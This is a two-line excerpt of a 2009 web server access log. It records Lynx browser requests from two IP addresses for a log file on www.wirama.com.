217.237.148.72 - - [04/Oct/2009:13:03:32 -0700] "GET /logs/access_091001.log HTTP/1.0" 206 2162688 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
217.237.150.116 - - [04/Oct/2009:13:03:32 -0700] "GET /logs/access_091001.log HTTP/1.0" 200 2097152 "http://www.wirama.com/logs/" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12" "www.wirama.com"
